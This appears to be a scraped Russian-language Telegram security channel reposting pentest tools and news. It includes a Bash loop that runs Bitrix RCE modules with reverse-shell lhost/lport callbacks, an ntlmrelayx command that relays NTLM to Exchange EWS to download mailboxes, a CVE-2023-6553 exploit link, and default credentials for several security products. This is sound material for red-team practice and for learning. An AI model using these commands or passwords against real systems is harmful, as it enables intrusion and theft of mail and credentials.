Forwarded from SecuriXy.kz
CrackMapExec - все...
переходим на NetExec
Вышла обнова v1.1.0 - nxc4u, новые фичи типа Kerberos Constrained Delegation, Execute Tasks on behalf of logged-on Users with Scheduled Tasks, BloodHound now supports computer accounts, FTP Enhancement, Module sorting, WinRM improvements и др
https://www.netexec.wiki
Ставиться проще простого через pipx
Запускается тоже просто
Для простоты восприятия можете добавить ~/.zshrc
переходим на NetExec
Вышла обнова v1.1.0 - nxc4u, новые фичи типа Kerberos Constrained Delegation, Execute Tasks on behalf of logged-on Users with Scheduled Tasks, BloodHound now supports computer accounts, FTP Enhancement, Module sorting, WinRM improvements и др
https://www.netexec.wiki
Ставиться проще простого через pipx
apt install pipx git
pipx ensurepath
pipx install git+https://github.com/Pennyw0rth/NetExec
Запускается тоже просто
NetExec
nxc
nxcdb
netexec
nxcdb
Для простоты восприятия можете добавить ~/.zshrc
alias cme=netexec
alias crackmapexec=netexec
Forwarded from LamerZen (Zenmovie)
godfuzz3r несколько месяцев написал плагин для бурпа, который декодит unicode
GitHub
GitHub - godfuzz3r/burp-ununicode: "de-unicode" unicode escaped sequenses
"de-unicode" unicode escaped sequenses. Contribute to godfuzz3r/burp-ununicode development by creating an account on GitHub.
Forwarded from Склад
GitHub
GitHub - pucherot/Pi.Alert: WIFI / LAN intruder detector. Check the devices connected and alert you with unknown devices. It also…
WIFI / LAN intruder detector. Check the devices connected and alert you with unknown devices. It also warns of the disconnection of "always connected" devices - pucherot/Pi.Alert
Forwarded from Похек (Sergey Zybnev)
quick-tricks
9 MB
Когда-то я выкладывал пост про интересную тулзу для быстрой проверки Bitrix на наличие простых уязвимостей. И я писал, что мол написал скрипт, но с вами им не поделился 🌚
Исправляюсь! Переписал скрипт, теперь он будет бегать по всем урлам построчно и проверять на всё что только можно из этого инструмента, кроме XSS, т.к. модуль фолзит, из-за того, что нагрузка тупо вставляется и если 200, то он пишет что якобы XSS нашёл, но в 99,999% случаев, сайт просто проглотит нагрузку и ничего не случиться.
#!/bin/bash
echo "Lauch netcat for revshells"
printf "Enter IP ($(curl -s 2ip.ru)): "
read $IP
printf "Enter Port: "
read $PORT
for ((i=1; i <= $(wc -l scope.txt | awk '{print $1;}'); i++))
do
quick-tricks spoofing -u $(sed -n "$i p" scope.txt)
quick-tricks redirect -u $(sed -n "$i p" scope.txt)
quick-tricks lfi -u $(sed -n "$i p" scope.txt)
quick-tricks recon -a -u $(sed -n "$i p" scope.txt)
quick-tricks rce vote-agent -u $(sed -n "$i p" scope.txt) --lhost $IP --lport $PORT --agentId 2
quick-tricks rce vote-agent -u $(sed -n "$i p" scope.txt) --lhost $IP --lport $PORT --agentId 4
quick-tricks rce vote-agent -u $(sed -n "$i p" scope.txt) --lhost $IP --lport $PORT --agentId 7
quick-tricks rce html-editor -u $(sed -n "$i p" scope.txt) --lhost $IP --lport $PORT
done
Please open Telegram to view this post
VIEW IN TELEGRAM
❤🔥1💔1
Forwarded from Proxy Bar
CVE-2023-6553 Exploit
Плагин
*
exploit
#wordpress #rce
Плагин
Backup Migration для WordPress , RCE до версии 1.3.7 включительно *
exploit
#wordpress #rce
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥3🥴1
Pentester's Backlog
MireaCTF finals Пока так 👍
По итогу финалов занимаем почётное 3-е место в официальном зачёте (на скрине общий).
Жанр Attack-Defense сам по себе очень интересен, заставляет не только поломать сервисы, но и поправить их (причём в довольно быстром ритме, всё же лидерборд не стоит на месте🐈 ), и вся эта ред/блю тимерская суета принесла много положительных эмоций
kurilka ❤️
Жанр Attack-Defense сам по себе очень интересен, заставляет не только поломать сервисы, но и поправить их (причём в довольно быстром ритме, всё же лидерборд не стоит на месте
kurilka ❤️
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥2❤1
Дальше - больше, лучше, качественнее, информативней и оперативнее!
Please open Telegram to view this post
VIEW IN TELEGRAM
💊3🔥1
Forwarded from true_security
первый релиз описанного выше модуля (целиком со всем проектом impacket):
https://github.com/feedb/impacket_ews
Возможно. у кого то найдется время и желание потестировать и закинуть запрос на добавление/улучшение.
запуск:
ntlmrelayx.py -smb2support -t https://exchange.com/EWS/exchange.asmx --ews --folder inbox
папки могут быть: inbox, drafts, sentItems, outbox, deletedItems
по дефолту качает inbox
https://github.com/feedb/impacket_ews
Возможно. у кого то найдется время и желание потестировать и закинуть запрос на добавление/улучшение.
запуск:
ntlmrelayx.py -smb2support -t https://exchange.com/EWS/exchange.asmx --ews --folder inbox
папки могут быть: inbox, drafts, sentItems, outbox, deletedItems
по дефолту качает inbox
GitHub
GitHub - feedb/impacket_ews
Contribute to feedb/impacket_ews development by creating an account on GitHub.
Forwarded from SecuriXy.kz
#SMTP Smuggling - #Spoofing E-Mails Worldwide
Вы просто прочитайте ответы вендоров:
Microsoft
"Thank you again for submitting this issue to Microsoft. Currently, MSRC prioritizes vulnerabilities that are assessed as “Important” or “Critical'’ severities for immediate servicing"
Cisco
"As previously mentioned, the "vulnerability" in Cisco Secure Email (Cloud) Gateway is not a bug, but a feature"
Нет слов, держите штаны покрепче...
https://sec-consult.com/blog/detail/smtp-smuggling-spoofing-e-mails-worldwide/
Вы просто прочитайте ответы вендоров:
Microsoft
"Thank you again for submitting this issue to Microsoft. Currently, MSRC prioritizes vulnerabilities that are assessed as “Important” or “Critical'’ severities for immediate servicing"
Cisco
"As previously mentioned, the "vulnerability" in Cisco Secure Email (Cloud) Gateway is not a bug, but a feature"
Нет слов, держите штаны покрепче...
https://sec-consult.com/blog/detail/smtp-smuggling-spoofing-e-mails-worldwide/
Forwarded from Cybred
Курс Red Team Operations with Cobalt Strike
Cobalt Strike — известный фреймворк пост-эксплуатации, предназначенный для выполнения целевых атак, имитации продвинутых действий хакеров, а также доставки полезной нагрузки на компьютеры жертв.
Операции Red Team позволяют максимально натуралистично имитировать атаку группы профессиональных внешних нарушителей для выявления уязвимостей инфраструктуры.
В этом курсе вы узнаете, как использовать Cobalt Strike в качестве инфраструктуры управления и контроля (C2), использовать маячки (beacon'ы) и специализированные профили для проведения необходимых техник Red Team и тестирования на проникновение.
Содержание курса:
— Operations: настройка сервера команды, глубокое погружения в модель Cobalt Strike для долгосрочных распределенных операций
— Infrastructure: управление листенерами и настройка различных вариантов маячков
— C2: введение в Malleable C2 — язык Cobalt Strike, предназначенный для настройки сетевых индикаторов
— Weaponization: объединение полезной нагрузки с артефактом или эксплойтом, который ее запускает, введение в Artifact Kit и Resource Kit
— Initial Access: веб-уязвимости и целевой фишинг
— Post Exploitation: как управлять маячками и сеансами, выполнять команды, извлекать данные; регистрировать нажатия клавиш, делать скриншоты, техники пост-эксплуатации.
— Privilege Escalation: представлен набор Elevate Kit, рассказывается об использовании SharpUp для поиска неправильных конфигураций и о том, как повысить права с помощью учетных данных; Kerberoasting и использование mimikatz
— Lateral Movement: научитесь красть токены, проводить атаку pass-the-hash и генерировать "золотые билеты" Kerberos
— Pivoting: как туннелировать Metasploit® Framework и другие инструменты через SOCKS-прокси
Cobalt Strike — известный фреймворк пост-эксплуатации, предназначенный для выполнения целевых атак, имитации продвинутых действий хакеров, а также доставки полезной нагрузки на компьютеры жертв.
Операции Red Team позволяют максимально натуралистично имитировать атаку группы профессиональных внешних нарушителей для выявления уязвимостей инфраструктуры.
В этом курсе вы узнаете, как использовать Cobalt Strike в качестве инфраструктуры управления и контроля (C2), использовать маячки (beacon'ы) и специализированные профили для проведения необходимых техник Red Team и тестирования на проникновение.
Содержание курса:
— Operations: настройка сервера команды, глубокое погружения в модель Cobalt Strike для долгосрочных распределенных операций
— Infrastructure: управление листенерами и настройка различных вариантов маячков
— C2: введение в Malleable C2 — язык Cobalt Strike, предназначенный для настройки сетевых индикаторов
— Weaponization: объединение полезной нагрузки с артефактом или эксплойтом, который ее запускает, введение в Artifact Kit и Resource Kit
— Initial Access: веб-уязвимости и целевой фишинг
— Post Exploitation: как управлять маячками и сеансами, выполнять команды, извлекать данные; регистрировать нажатия клавиш, делать скриншоты, техники пост-эксплуатации.
— Privilege Escalation: представлен набор Elevate Kit, рассказывается об использовании SharpUp для поиска неправильных конфигураций и о том, как повысить права с помощью учетных данных; Kerberoasting и использование mimikatz
— Lateral Movement: научитесь красть токены, проводить атаку pass-the-hash и генерировать "золотые билеты" Kerberos
— Pivoting: как туннелировать Metasploit® Framework и другие инструменты через SOCKS-прокси
YouTube
Red Team Ops with Cobalt Strike (1 of 9): Operations
Course Playlist: https://www.youtube.com/playlist?list=PL9HO6M_MU2nfQ4kHSCzAQMqxQxH47d1no
This video introduces the Red Team Operations with Cobalt Strike course and kicks off its first lecture. The operations lecture starts with an overview of the Cobalt…
This video introduces the Red Team Operations with Cobalt Strike course and kicks off its first lecture. The operations lecture starts with an overview of the Cobalt…
Forwarded from Caster
Рад представить вам монструозный читшит по MITM-атакам
Caster - MITMonster
Genre: Offensive, Defensive
Subgenre: MITM Attacks, MITM Attacks Protection
Label: github.com
Release Date: 1 January 2024
Link: https://github.com/wearecaster/MITMonster
Caster - MITMonster
Genre: Offensive, Defensive
Subgenre: MITM Attacks, MITM Attacks Protection
Label: github.com
Release Date: 1 January 2024
Link: https://github.com/wearecaster/MITMonster
GitHub
GitHub - caster0x00/Intercept: MITM Field Manual
MITM Field Manual. Contribute to caster0x00/Intercept development by creating an account on GitHub.
😡1
Internal All The Things - Internal pentest cheatsheet by swisskyrepo
https://swisskyrepo.github.io/InternalAllTheThings/
https://swisskyrepo.github.io/InternalAllTheThings/
Сканнер уязвимостей CMS "1C-Bitrix" check_bitrix by k1rurk (спасибо @m0xes за наводку 😠 )
Из приятного: скан и эксплуатация также и последних уязвимостей и юзер-френдли интерфейс
Список проверок:
https://github.com/k1rurk/check_bitrix
Из приятного: скан и эксплуатация также и последних уязвимостей и юзер-френдли интерфейс
Список проверок:
exposed login pages
exposed register pages
pages that contain errors
admin panels
content spoofing
open redirect
reflected xss
stored xss via file upload (works only with Apache)
ssrf
RCE (obj injection, vote-agent, .htaccess, phar deser, file creation)
https://github.com/k1rurk/check_bitrix
Please open Telegram to view this post
VIEW IN TELEGRAM
GitHub
GitHub - k1rurk/check_bitrix: Check bitrix vulnerabilities
Check bitrix vulnerabilities. Contribute to k1rurk/check_bitrix development by creating an account on GitHub.
❤2❤🔥1💯1
Forwarded from true_security
на пентестах бывают случаи когда компрометация происходит через средства обнаружения атак и средства защиты....далеко не все фильтруют сетевой доступ к компонентам СЗИ.
Так сказать, спасибо за дефолтные пароли:
Докидывайте дефолтные пароли сзи в комментах)
Так сказать, спасибо за дефолтные пароли:
- rvision soar/deception/etc... ssh root:pxtm0222; postgres rvision:pxtm0222
- maxpatrol VM: Administrator:P@ssw0rd
- maxpatrol siem: Administrator:P@ssw0rd; rabbitmq: siem:P@ssw0rd или mpx_siem:P@ssw0rd
- pt xdr: Administrator:P@ssw0rd
- pt nad: administrator:P0sitive или administrator:Administr@t0r
- security vision soar: postgres postgres:1q2w#E$R
- kuma (kaspersky siem): admin:mustB3Ch@ng3d!
Докидывайте дефолтные пароли сзи в комментах)
Forwarded from 1N73LL1G3NC3
GTFONow
Automatic privilege escalation for misconfigured capabilities, sudo and suid binaries using GTFOBins.
Automatic privilege escalation for misconfigured capabilities, sudo and suid binaries using GTFOBins.
Попал (по рекомендации ;D) в список телеграм-каналов по информационной безопасности 2024
Приятно! Работаем дальше.
Приятно! Работаем дальше.
👨💻4
Два прекрасных репозитория с софтом для проверки возможности обхода запрещенных эндпоинтов
https://github.com/devploit/dontgo403
https://github.com/laluka/bypass-url-parser
Please open Telegram to view this post
VIEW IN TELEGRAM
❤2